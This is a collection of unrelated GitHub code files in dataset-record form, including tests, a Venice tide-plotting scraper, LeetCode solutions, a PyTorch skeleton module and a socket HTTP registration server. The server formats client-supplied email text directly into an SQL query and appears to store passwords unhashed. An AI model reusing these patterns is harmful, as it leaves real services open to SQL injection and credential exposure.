Path):\n loader = WheelConverter()\n path = requirements_path / 'wheel.whl'\n root = loader.load(path)\n deps = {dep.name: dep for dep in root.dependencies}\n assert set(deps) == {'attrs', 'cached-property', 'packaging', 'requests'}\n\n\ndef test_load_metadata(requirements_path: Path):\n loader = WheelConverter()\n path = requirements_path / 'wheel.whl'\n root = loader.load(path)\n\n assert root.name == 'dephell'\n assert root.version == '0.2.0'\n assert root.authors[0].name == 'orsinium'\n assert not root.license\n","repo_name":"dephell/dephell","sub_path":"tests/test_converters/test_wheel.py","file_name":"test_wheel.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"28419953316","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 30 10:25:15 2021\r\n\r\n@author: Oli\r\n\"\"\"\r\n\r\nimport pytest \r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport netCDF4 as nc\r\nimport os\r\nimport random\r\nfrom copy import deepcopy\r\n\r\nrandom.seed(1987)\r\n\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nwd = os.getcwd().replace('\\\\', '/')\r\nexec(open(\"test_setup.py\").read())\r\n\r\nfrom Core_functionality.Trees.Transfer_tree import define_tree_links, predict_from_tree\r\nfrom Core_functionality.AFTs.agent_class import AFT\r\nfrom Core_functionality.AFTs.arable_afts import SOSH, Intense_arable\r\nfrom model_interface.wham import WHAM\r\n\r\n\r\n#########################################################################\r\n\r\n### Load test data\r\n\r\n#########################################################################\r\n\r\nclass multiple_agent(AFT):\r\n \r\n def setup(self):\r\n AFT.setup(self)\r\n self.afr = 'Test'\r\n self.ls = 'Test'\r\n \r\n self.sub_AFT = {'exists': True, 'kind': 'Multiple', \r\n 'afr': ['Test', 'Test'], 'ls': ['Test', 'Test']} \r\n \r\n\r\n\r\n\r\nos.chdir(str(wd + '/test_data/AFTs').replace('\\\\', '/'))\r\nDummy_frame = pd.read_csv('Dummy_pars.csv')\r\nDummy_dat = nc.Dataset('Test.nc')\r\nDummy_dat = Dummy_dat['Forest_frac'][:]\r\nDummy_dat2 = 27647 - np.arange(27648)\r\nMap_data = {'Test': Dummy_dat, 'Test2': Dummy_dat2}\r\nMap_test = np.array(pd.read_csv('Test_raster.csv'))\r\nMap_data['Area'] = np.array([1]*27648)\r\n\r\n### Mock load up\r\ndummy_pars = {'AFT_dist': {}, \r\n 'Fire_use': {}, \r\n 'Dist_pars':{'Thresholds': {}, \r\n 'Probs': {}}} \r\n\r\ndummy_pars['AFT_dist']['Test/Test'] = Dummy_frame\r\ndummy_pars['AFT_dist']['Sub_AFTs/Test_Test'] = deepcopy(Dummy_frame)\r\ndummy_pars['AFT_dist']['Sub_AFTs/Test_Test'].columns = ['Unnamed: 0', 'var', 'n', 'dev', 'yval', 'splits.cutleft',\r\n 'splits.cutright', 'yprob.FALSE', 'multiple_agent']\r\n\r\ndummy_pars['Dist_pars']['Thresholds']['Test/Test'] = [pd.DataFrame(np.random.normal(8.5, 10, 1)), \r\n pd.DataFrame(np.random.normal(240, 10, 1))]\r\n\r\ndummy_pars['Dist_pars']['Probs']['Test/Test'] = [pd.DataFrame(pd.Series([np.random.beta(1, 1) for x in range(1)]), \r\n columns = ['TRUE.']) for x in range(3)]\r\n\r\ndummy_pars['Dist_pars']['Thresholds']['Sub_AFTs/Test_Test'] = [pd.DataFrame(np.random.normal(8.5, 10, 10)), \r\n pd.DataFrame(np.random.normal(240, 10, 10))]\r\n\r\ndummy_pars['Dist_pars']['Probs']['Sub_AFTs/Test_Test'] = [pd.DataFrame(pd.Series([np.random.beta(1, 1) for x in range(10)]), \r\n columns = ['multiple_agent']) for x in range(3)]\r\n\r\n\r\n\r\n### Mock model\r\nparameters = {\r\n \r\n 'xlen': 192, \r\n 'ylen': 144,\r\n 'AFTs': [multiple_agent],\r\n 'LS' : [],\r\n 'AFT_pars': dummy_pars,\r\n 'Maps' : Map_data,\r\n 'start_run': 0,\r\n 'theta' : 0.1, \r\n 'bootstrap': True, \r\n 'Observers': {},\r\n 'reporters': [], \r\n 'n_cores' : 4\r\n \r\n }\r\n\r\n\r\n##########################################################################\r\n\r\n### tests\r\n\r\n##########################################################################\r\n\r\ndef test_AFT_boot():\r\n \r\n errors = []\r\n \r\n mod = WHAM(parameters)\r\n mod.setup()\r\n mod.agents.sub_compete()\r\n \r\n probs = mod.agents[0].AFT_frame[1]['multiple_agent'][mod.agents[0].AFT_frame[1]['var'] == ''].to_list()\r\n \r\n if not probs == [float(x.iloc[-1]) for x in mod.agents[0].boot_AFT_pars[1]['Probs']]:\r\n errors.append(\"Bootstrapped parameters not loaded properly\")\r\n \r\n ### which values do not equal the mode?\r\n gt_thresh_1 = len(pd.concat([pd.Series(np.arange(0, x)) if x >= 1 else pd.Series(0) for x in mod.agents[0].boot_AFT_pars[0]['Thresholds'][0][0]]).unique())-1\r\n \r\n if not gt_thresh_1 == len(np.where(mod.agents[0].AFT_vals[0] != stats.mode(np.array(mod.agents[0].AFT_vals[0]))[0][0])[0]):\r\n \r\n errors.append(\"Bootstrapped prediction error\")\r\n \r\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\r\n \r\n","repo_name":"OliPerkins1987/Wildfire_Human_Agency_Model","sub_path":"tests/test_aft_boot.py","file_name":"test_aft_boot.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6938269821","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport wget\nimport os\nfrom datetime import datetime\n\n\n#raccolta ed estrazione dati\nnomefile=['venezia','sannicolo','alberoni','pellestrina','chioggia']\nurls=['https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Punta_Salute.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Sud_Lido.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Nord_Malamocco.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Diga_Sud_Chioggia.html',\n 'https://www.comune.venezia.it/sites/default/files/publicCPSM2/stazioni/temporeale/Chioggia_Citta.html']\n\ndef scarica(nomefile,urls,path_data):\n dflist=[]\n for nome, url in zip(nomefile,urls):\n try:\n os.remove(f'{path_data}{nome}.html')\n except OSError:\n pass\n wget.download(url, f'{path_data}{nome}.html')\n df=pd.read_html(f'{path_data}{nome}.html')[0]\n\n df['Data'] = df['Data'].apply(lambda x: datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\")) #conversione in formato datetime\n df['Giorno'] = df['Data'].dt.date\n df['Ora'] = df['Data'].dt.strftime('%H:%M')\n df = df.rename({df.columns[1]:'Altezza s.l.m. [cm]'}, axis=1) # colonna rinominata in previsione della conversione\n df['Altezza s.l.m. [cm]'] = df['Altezza s.l.m. [cm]']*100 # conversione altezza marea da m a cm\n if (nome == 'sannicolo') | (nome=='pellestrina'):\n df = df.rename({df.columns[3]:'Velocità media vento [km/h]'}, axis=1) # colonna rinominata in previsione della conversione\n df['Velocità media vento [km/h]'] = df['Velocità media vento [km/h]']*3.6 # conversione velocità vento da m/s a km/h\n \n dflist.append(df) \n return dflist\n\n\ndata =datetime.today().strftime('%Y-%m-%d')\npath_data = f'./archivio/{data}/'\nos.makedirs(path_data, exist_ok=True)\ndf_venezia,df_sannicolo,df_alberoni,df_pellestrina,df_chioggia=scarica(nomefile,urls, path_data)\n\n\n\n#grafici\nplt.rcParams.update({'text.usetex': True, \n 'font.family': 'Helvetica', \n 'font.size': 17})\nlw = 2\n\nfig, axs=plt.subplots(nrows=2,ncols=2, sharex = True, figsize=(15,15))\nfig.suptitle(f'Marea del {data}')\n\n\ndf_venezia.plot(x='Ora', y='Altezza s.l.m. [cm]', color='black', lw=lw, label='Venezia', ax=axs[0][0], grid=True, title='Venezia centro storico').set(ylabel='Altezza marea s.l.m. [cm]')\ndf_sannicolo.plot(x='Ora', y='Altezza s.l.m. [cm]', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[1][0])\ndf_alberoni.plot(x='Ora', y='Altezza s.l.m. [cm]', color='green', lw=lw, label='Lido-Pellestrina', ax=axs[1][0])\ndf_pellestrina.plot(x='Ora', y='Altezza s.l.m. [cm]', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[1][0])\ndf_chioggia.plot(x='Ora', y='Altezza s.l.m. [cm]', color='red', lw=lw, label='Chioggia', ax=axs[1][0], grid=True, title='Bocche di porto e città di Chioggia').set(ylabel='Altezza marea s.l.m. [cm]')\naxs[0][0].annotate('Suolo medio', (0.01,0.48), xycoords='axes fraction')\naxs[0][0].axhline(100, color='k',linestyle='dotted')\naxs[1][0].annotate('Suolo medio', (0.01,0.48), xycoords='axes fraction')\naxs[1][0].axhline(100, color='k',linestyle='dotted')\n\ndf_sannicolo.plot(x='Ora', y='Velocità media vento [km/h]', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[0][1])\ndf_pellestrina.plot(x='Ora', y='Velocità media vento [km/h]', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[0][1], grid=True, title='Velocità media del vento').set(ylabel='Velocità [km/h]')\ndf_sannicolo.plot(x='Ora', y='Faro Diga LidoD.Vento med. 10m', color='dodgerblue', lw=lw, label='Punta sabbioni-Lido', ax=axs[1][1])\ndf_pellestrina.plot(x='Ora', y='D.S.ChioggiaD.Vento med. 10m', color='saddlebrown', lw=lw, label='Pellestrina-Chioggia', ax=axs[1][1], grid=True, title='Direzione media del vento').set(ylabel='Direzione [gradi]')\naxs[1][1].annotate('Scirocco', (0.89,0.35), xycoords='axes fraction')\naxs[1][1].annotate('Bora', (0.93,0.2), xycoords='axes fraction')\n\n\nmareamin,mareamax,step = 0,210,10\naxs[0][0].axhspan(90, 110, facecolor='yellow', alpha=0.25)\naxs[0][0].axhspan(110, 140, facecolor='orange', alpha=0.3)\naxs[0][0].axhspan(140, mareamax+step, facecolor='red', alpha=0.3)\naxs[1][0].axhspan(90, 110, facecolor='yellow', alpha=0.25)\naxs[1][0].axhspan(110, 140, facecolor='orange', alpha=0.3)\naxs[1][0].axhspan(140, mareamax+step, facecolor='red', alpha=0.3)\naxs[1][1].axhspan(30, 90, facecolor='dodgerblue', alpha=0.15)\naxs[1][1].axhspan(100, 150, facecolor='red', alpha=0.15)\n\naxs[0][0].set_ylim(mareamin,mareamax+1)\naxs[1][0].set_ylim(mareamin,mareamax+1)\naxs[0][0].set_yticks(np.arange(mareamin,mareamax+1,step))\naxs[1][0].set_yticks(np.arange(mareamin,mareamax+1,step))\naxs[1][1].set_yticks(np.arange(0,351,50))\naxs[0][0].set_xlabel(' ')\naxs[0][1].set_xlabel(' ')\naxs[0][0].grid(ls=':')\naxs[0][1].grid(ls=':')\naxs[1][0].grid(ls=':')\naxs[1][1].grid(ls=':')\naxs[0][0].legend(loc='upper left')\naxs[1][0].legend(loc='upper left')\nplt.tight_layout()\nplt.subplots_adjust(bottom=0.1,top=0.9, right=0.96, wspace=0.15, hspace=0.2)\nplt.show()\nfig.savefig(f'{path_data}{data}.png')\n","repo_name":"erikakorb/AcquaAlta","sub_path":"acqua_alta.py","file_name":"acqua_alta.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22934478487","text":"# Given a non-empty array of integers, every element appears twice except for one. Find that single one.\n#\n# Note:\n#\n# Your algorithm should have a linear runtime complexity. Could you implement it without using extra memory?\n#\n# Example 1:\n#\n# Input: [2,2,1]\n# Output: 1\n#\n# Example 2:\n#\n# Input: [4,1,2,1,2]\n# Output: 4\n\n\nclass Solution(object):\n\n # Naive first to mind solution: Add elements of array to a dictionary where the key is the number, and the value is the amount.\n # Then go through the dic and return the key that has a value one 1.\n # Time complexity: O(N) to insert all the numbers into the dictionary, and O(N) to find the number with value == 1\n # we're sacrificing O(N) space complexity to create the hash table.\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n dic = {}\n for num in nums:\n if num in dic:\n dic[num] = 2\n else:\n dic[num] = 1\n\n for element in dic:\n if dic[element] == 1:\n return element\n","repo_name":"PikaPreme/data-structures-algorithms-practice","sub_path":"python/questions/136_single_number.py","file_name":"136_single_number.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16757501355","text":"def calСulate(x):\n return x**5 + abs(x)\n\nprint(\"\"\"ЛАБОРАТОРНА РОБОТА №1\nВИКОНАВ СТУДЕНТ 1 КУРСУ ГРУППИ КМ-84\nМИСАК ЮРІЙ\nПРОГРАМУВАННЯ ЛІНІЙНИХ АЛГОРИТМІВ ТА РОЗГАЛУЖЕНИХ ПРОЦЕСІВ\n\"\"\")\n\nwhile True :\n\n argument = input(\"ВВЕДІТЬ ЦІЛЕ ЧИСЛО:\")\n try:\n argument = int(argument)\n except ValueError:\n print('НАСТУПНОГО РАЗУ ВВЕДІТЬ ЦІЛЕ ЧИСЛО:')\n continue\n\n print(calСulate(int(argument)))\n","repo_name":"GeorgeMysak/LABA","sub_path":"LB1.py","file_name":"LB1.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14447334806","text":"# -*- coding: utf-8 -*-\n#\n# Author: maajor \n# Date : 2020-05-23\n# \n# Code adopted from https://github.com/CalciferZh/SMPL/blob/master/smpl_torch_batch.py\n# With simplification and correction to make it work with blender.\n\nimport numpy as np\nimport pickle\nimport torch\nfrom torch.nn import Module\nimport os\n\nclass Skeleton(Module):\n def __init__(self, skeleton_path='data/skeleton.pt'):\n \n super(Skeleton, self).__init__()\n with open(skeleton_path, 'rb') as f:\n params = pickle.load(f)\n # joints position, n_joint * 3\n #self.J = torch.from_numpy(params['J']).type(torch.float32)\n self.register_buffer('J', torch.from_numpy(params['J']).type(torch.float32))\n self.J.requires_grad = False\n self.J_num = self.J.size()[0]\n # parent joint id to child joint id mapping, 2 * n_joints\n self.kintree_table = params['kintree_table']\n self.bone_id = params['name_to_id']\n\n @staticmethod\n def rodrigues(r):\n \"\"\"\n Rodrigues' rotation formula that turns axis-angle tensor into rotation\n matrix in a batch-ed manner.\n\n Parameter:\n ----------\n r: Axis-angle rotation tensor of shape [batch_size, 1, 3].\n\n Return:\n -------\n Rotation matrix of shape [batch_size, 3, 3].\n\n \"\"\"\n #r = r.to(self.device)\n eps = r.clone().normal_(std=1e-8)\n # why not work in pytorch1.4.0\n #theta = torch.norm(r + eps, dim=(1, 2), keepdim=True) # dim cannot be tuple\n theta = torch.sqrt(torch.sum((r + eps)**2, dim=2)).view(-1,1,1)\n theta_dim = theta.shape[0]\n r_hat = r / theta\n cos = torch.cos(theta)\n z_stick = torch.zeros(theta_dim, dtype=torch.float32).to(r.device)\n m = torch.stack(\n (z_stick, -r_hat[:, 0, 2], r_hat[:, 0, 1], r_hat[:, 0, 2], z_stick,\n -r_hat[:, 0, 0], -r_hat[:, 0, 1], r_hat[:, 0, 0], z_stick), dim=1)\n m = torch.reshape(m, (-1, 3, 3))\n i_cube = (torch.eye(3, dtype=torch.float32).unsqueeze(dim=0) \\\n + torch.zeros((theta_dim, 3, 3), dtype=torch.float32)).to(r.device)\n A = r_hat.permute(0, 2, 1)\n dot = torch.matmul(A, r_hat)\n R = cos * i_cube + (1 - cos) * dot + torch.sin(theta) * m\n return R\n\n def to4x4(self, rotationMatrix):\n identity = torch.eye(4).view(1, 1, 4,4).repeat(rotationMatrix.shape[0],rotationMatrix.shape[1],1,1).to(rotationMatrix.device)\n identity[:, :, :3,:3] = rotationMatrix\n return identity\n\n def write_obj(self, file_name):\n with open(file_name, 'wb') as fp:\n pickle.dump(self.J_posed.detach().cpu().numpy(), fp)\n\n def forward(self, pose, trans):\n \"\"\"\n Construct a compute graph that takes in parameters and outputs a tensor as\n model vertices. Face indices are also returned as a numpy ndarray.\n\n Prameters:\n ---------\n pose: a [n_pose_joint,3] tensor indicating child joint rotation\n relative to parent joint. For root joint it's global orientation.\n Represented in a axis-angle format.\n\n trans: Global translation tensor of shape [3].\n\n Return:\n ------\n A tensor for vertices, and a numpy ndarray as face indices.\n\n \"\"\"\n parent = {\n self.kintree_table[1, i]: self.kintree_table[0, i]\n for i in range(1, self.kintree_table.shape[1])\n }\n\n batch_num = pose.shape[0]\n J = self.J.view(1,-1, 4, 4).repeat(batch_num, 1, 1, 1)\n localRot = self.rodrigues(pose.view(-1, 1, 3)).reshape(batch_num, -1, 3, 3)\n localRot = self.to4x4(localRot)\n\n # transform matrix of each joints\n root = torch.matmul(J[:,0], localRot[:,0])\n results = [root]\n for i in range(1, self.kintree_table.shape[1]):\n localTransform = torch.matmul(J[:, i], localRot[:,i])\n objectTransform = torch.matmul(results[parent[i]],localTransform)\n results.append(objectTransform)\n \n stacked = torch.stack(results, dim=1)\n\n # posed joint position\n self.J_posed = stacked[:,:,:3,3]\n\n self.J_posed = self.J_posed + torch.reshape(trans, (batch_num, 1, 3))\n\n return self.J_posed\n\n\ndef main():\n pose_size = 31*3\n\n device = torch.device(\"cpu\")\n\n pose = torch.from_numpy((np.random.rand(pose_size) - 0.5) * 0.0)\\\n .type(torch.float32).to(device).view(1,-1, 3)\n\n trans = torch.from_numpy(np.zeros(3)).type(torch.float32).to(device)\n\n model = Skeleton(skeleton_path='data/skeleton.pt')\n model.to(device)\n j = model(pose, trans.view(1, 3))\n\n theta = torch.sqrt(torch.sum((pose)**2, dim=2)).view(1, -1, 1)\n r_hat = pose / theta\n aa = torch.zeros((31,4))\n aa[:,0:1] = theta.view(-1,1)\n aa[:,1:] = r_hat.view(-1,3)\n\n result={}\n result[\"pose\"] = aa.view(-1,4).detach().cpu().numpy().tolist()\n result[\"trans\"] = trans.detach().cpu().numpy().tolist()\n result[\"joints\"] = j.detach().cpu().numpy().tolist()\n with open(\"pose.pkl\", \"wb\") as f:\n pickle.dump(result, f)\n\nif __name__ == '__main__':\n main()\n","repo_name":"maajor/latent-pose","sub_path":"nnutils/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"17330479574","text":"# -*- coding: utf-8 -*-\nposs = [0]\nfor i in range(1, 101):\n poss.append(i * i + poss[i - 1])\n\nwhile (True):\n n = int(input())\n if (n == 0):\n break\n print(poss[n])\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1323.py","file_name":"1323.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8944700329","text":"import controllers.adjustmentPanel\n\nfrom flask import redirect\nfrom db import mysql\n\nclass db_insert_historyProductionParametersAdjustFilterImg():\n def salvar(imageName):\n id = imageName\n name = controllers.adjustmentPanel.varname\n parameter01 = controllers.adjustmentPanel.varTrackbar1\n parameter02 = controllers.adjustmentPanel.varTrackbar2\n parameter03 = controllers.adjustmentPanel.varTrackbar3\n parameter04 = controllers.adjustmentPanel.varTrackbar4\n parameter05 = controllers.adjustmentPanel.varTrackbar5\n parameter06 = controllers.adjustmentPanel.varTrackbar6\n parameter07 = controllers.adjustmentPanel.varTrackbar_iterations_erode\n parameter08 = controllers.adjustmentPanel.varTrackbar_iterations_dilate\n parameter09 = controllers.adjustmentPanel.varTrackbar_TamMinLv\n parameter10 = controllers.adjustmentPanel.varTrackbar_TamMaxLv\n parameter11 = controllers.adjustmentPanel.varTrackbar_TamMinLh\n parameter12 = controllers.adjustmentPanel.varTrackbar_TamMaxLh\n parameter13 = controllers.adjustmentPanel.varTrackbar_TamMin\n parameter14 = controllers.adjustmentPanel.varTrackbar_TamMax\n parameter15 = controllers.adjustmentPanel.varTrackbar_LineHorizontal\n parameter16 = controllers.adjustmentPanel.varTrackbar_LineVertical\n parameter17 = controllers.adjustmentPanel.varTrackbar_LineRange\n parameter18 = 0\n parameter19 = 0\n parameter20 = 0\n parameterReal01 = controllers.adjustmentPanel.varTrackbar_ConstResolutionPixelMm_X\n parameterReal02 = controllers.adjustmentPanel.varTrackbar_ConstResolutionPixelMm_Y\n parameterReal03 = 0.0\n parameterReal04 = 0.0\n\n with mysql.cursor() as cur:\n #try:\n cur.execute(\"INSERT INTO historyProductionParametersAdjustFilterImg VALUE\"\n \"(%s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s, \"\n \"%s, %s, %s, %s, %s,\"\n \"%s, %s, %s, %s\"\n \")\",\n (id, name,\n parameter01 , parameter02 , parameter03 , parameter04 , parameter05,\n parameter06 , parameter07 , parameter08 , parameter09 , parameter10,\n parameter11 , parameter12 , parameter13 , parameter14 , parameter15,\n parameter16 , parameter17 , parameter18 , parameter19 , parameter20,\n parameterReal01 , parameterReal02 , parameterReal03 , parameterReal04\n ))\n cur.connection.commit()\n return redirect('base.html')","repo_name":"RenanSyntro/pythonOpencvDell_FLask","sub_path":"src/database/db_insert_historyProductionParametersAdjustFilterImg.py","file_name":"db_insert_historyProductionParametersAdjustFilterImg.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725189266","text":"\"\"\"\n给定一个字符串数组,将字母异位词组合在一起。字母异位词指字母相同,但排列不同的字符串。\n\n示例:\n\n输入: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n输出:\n[\n [\"ate\",\"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\n\n\"\"\"\n\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n # key:每个字母出现的次数 value:一个装单词的list\n hashmap = {}\n\n for string in strs:\n key = self.getKeybyCount(string)\n if key in hashmap:\n hashmap[key].append(string)\n else:\n hashmap[key] = [string]\n\n return [value for value in hashmap.values()]\n\n # 把每个单词所对应的hash给记录下来\n def getKeybyCount(self, string):\n table = [0] * 26\n for char in string:\n table[ord(char) - ord(\"a\")] += 1\n\n return str(table)\n\n\n\"\"\" \nTime: O(n*k)\nhttps://algocasts.io/episodes/vkmerKGb\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Hashmap/49. 字母异位词分组(变位词).py","file_name":"49. 字母异位词分组(变位词).py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24147585171","text":"import socket,random,threading,hashlib,time,sys,os\nsys.path.append('../../')\nsys.path.append('../')\nfrom multiprocessing import Process\nfrom cbEmail import Email\nfrom Config import Config\nfrom myLib.mydb import mysqldb as mydb\nclass log:\n def __init__(self):\n self.data=''\n def out(self,text,filename):\n nowTime=time.localtime()\n nowTime=\"[%s-%s-%s %s:%s:%s]\"%(nowTime.tm_year,nowTime.tm_mon,nowTime.tm_mday,nowTime.tm_hour,nowTime.tm_min,nowTime.tm_sec)\n self.data+=''+nowTime+text\n if len(self.data.encode('utf-8'))>0:\n # print('日志缓存已满,写入到文件中')\n print(self.data)\n with open('log/%s.txt'%filename,'a',encoding='utf-8') as f:\n f.write(self.data)\n self.data=''\nclass HTTPStatus:\n def __init__(self,_type,content=None):\n self.response_headers = \"Server: CB HTTP Server\\r\\ncontent-type: text/html; charset=UTF-8\\r\\n\"\n if _type=='成功':#成功\n self.response_start_line = \"HTTP/1.1 200 成功\\r\\n\"\n self.response_body = '成功'\n\n elif _type=='拒绝':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 403 请求被拒绝\\r\\n\"\n self.response_body = '被服务器拒绝访问'\n\n elif _type=='未授权':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 401 权限不足\\r\\n\"\n self.response_body = '权限不足'\n\n elif _type=='失败':#拒绝请求(被服务器禁止,如IP被封锁)\n self.response_start_line = \"HTTP/1.1 202 请求失败\\r\\n\"\n self.response_body = content\n\n elif _type=='参数错误':#错误访问(有对应请求头,但参数不合法)\n self.response_start_line = \"HTTP/1.1 405 参数错误\\r\\n\"\n self.response_body = '参数错误'\n\n elif _type=='请求头错误':#错误访问(无请求头)\n self.response_start_line = \"HTTP/1.1 417 错误的请求\\r\\n\"\n self.response_body = '非法请求'\n\n elif _type=='服务器错误':#服务器错误(当服务器处理出现错误)\n self.response_start_line = \"HTTP/1.1 500 服务器出现错误\\r\\n\"\n self.response_body = '服务器发生错误'\n\n elif _type=='请求不存在':#不存在的请求(服务器不存在的请求类型)\n self.response_start_line = \"HTTP/1.1 400 不存在的请求类型\\r\\n\"\n self.response_body = '不支持的请求类型'\n\n self.response = self.response_start_line + self.response_headers + \"\\r\\n\" + self.response_body\nclass HTTPProcess:\n def __init__(self,data,db):\n self.db=db\n self.parameter=None\n data=data.replace('\\r','')\n data=data.split('\\n')\n a1=data[0].index(' ')+1\n a2=data[0].index(' ',a1+1)\n self.method=data[0][:a1-1]\n self.protocol=data[0][a2+1:]\n self.url=data[0][a1:a2]\n try:\n a1=self.url.index('?')\n self.interface=self.url[1:a1]\n parameterStr=self.url[a1+1:]\n self.parameter={}\n i=0\n while i0:\n self.result=HTTPStatus('成功')\n print('[%d]发送验证码邮件:'%index,self.parameter['email'],confirmcode)\n self.sendConfirmCodeEmail(self.parameter['email'],confirmcode)\n else:\n print('[4]身份码不合法,此请求权限不够,返回NoPermissions')\n self.result=HTTPStatus('未授权')\n return\n else:\n print('[3]数据合理性检查不通过')\n self.result=HTTPStatus('参数错误')\n if self.interface == 'register':\n print('[2]此请求为用户注册')\n if self.checkRequestCondition('register'):\n print('[3]数据合理性检查通过')\n if self.db.exist('user',{'account':self.parameter['account']}):\n print('[4]账号已被使用,注册失败')\n self.result=HTTPStatus('失败','账号已被使用')\n else:\n if self.db.exist('user',{'email':self.parameter['email']}):\n print('[4]邮箱已被使用,注册失败')\n self.result=HTTPStatus('失败','邮箱已被使用')\n else:\n print('[4]账号或邮箱可被使用')\n if self.db.exist('confirmcode',{'email':self.parameter['email']}):\n print('[5]邮箱验证码已在数据库内')\n count,r=self.db.selectFromWhere('confirmcode','email=\\'%s\\''%(self.parameter['email']))\n code=r[0][2]\n if code==self.parameter['confirmcode']:\n print('[6]验证码匹配成功')\n if self.db.insertTo('user',{'name':'新用户','account':self.parameter['account'],'password':self.parameter['password'],'email':self.parameter['email'],'regDate':self.db.getNowTime(),'lastDate':self.db.getNowTime(),'lastIP':self.header['Host'][:self.header['Host'].index(':')]}):\n print('[7]新的用户数据插入成功')\n self.result=HTTPStatus('成功')\n else:\n print('[7]新的用户数据插入失败')\n self.result=HTTPStatus('服务器错误')\n else:\n print('[6]验证码匹配失败')\n self.result=HTTPStatus('失败','验证码错误')\n else:\n print('[5]邮箱验证码未数据库内,失败')\n self.result=HTTPStatus('失败','邮箱未进行验证或已过期')\n else:\n print('[3]数据合理性检查不通过,返回参数错误')\n self.result=HTTPStatus('参数错误')\n return\n self.result=HTTPStatus('请求不存在')\n def __str__(self):\n s='请求方法:'+self.method+'\\n'\n s+='请求URL:'+self.url+'\\n'\n s+='请求接口'+self.interface+'\\n'\n s+='请求参数'+(str(self.parameter) if self.parameter else '无')+'\\n'\n s+='请求协议版本:'+self.protocol+'\\n'\n s+='请求头:\\n'\n for i in self.header:\n s+='%s:%s\\n'%(i,self.header[i])\n return s\nclass HTTPServer:\n def __init__(self):\n self.log=log()\n\n self.server_socket=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.bind(('',20203))\n self.process=Process(target=self.start,args=())\n self.process.start()\n def start(self):\n self.db=mydb('127.0.0.1','root','123456','cb')\n self.server_socket.listen()\n while True:\n client_socket, client_address = self.server_socket.accept()\n self.log.out(\"[%s, %s]用户连接上了\" % client_address,'httplog')\n clientProcess = threading.Thread(target=self.clientProcess, args=(client_socket,))\n clientProcess.start()\n \n def clientProcess(self,client_sock):\n request_data = client_sock.recv(1024).decode('utf-8')\n print('原始数据:')\n print(request_data)\n print('---------------------')\n print('数据接受完成,开始处理数据')\n process=HTTPProcess(request_data,self.db)\n process.process()\n self.log.out('请求响应:%s'%process.result.response_start_line,'httplog')\n client_sock.send(bytes(process.result.response, \"utf-8\"))\n client_sock.close()\n\nif __name__ == \"__main__\":\n server=HTTPServer()\n server.start()","repo_name":"Minicking/cloudbird","sub_path":"Server/HTTPServer.py","file_name":"HTTPServer.py","file_ext":"py","file_size_in_byte":11367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5311836567","text":"import sys\nimport numpy as np\nimport time\nimport threading\nimport xlrd\nimport numpy as np\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument('--problem',help='problrm number',type=int)\nparser.add_argument('--method',help='used function: greedy or genetic',type=str)\nargs=parser.parse_args()\n\nclass process_data:\n\t\"\"\"\n\tget data from csv file. extract pucks, tickets, gates, and calculate puck's timetable\n\ta important method indexof_pucks_gates(elf,pucks,gates) is designed to connect pucks and gates, return a pucks.num x gates.num bool metrix -- Index.\n\tIndex[i,j]==True present pucks[i] can use gates[j]\n\t\"\"\"\n\tdef __init__(self, 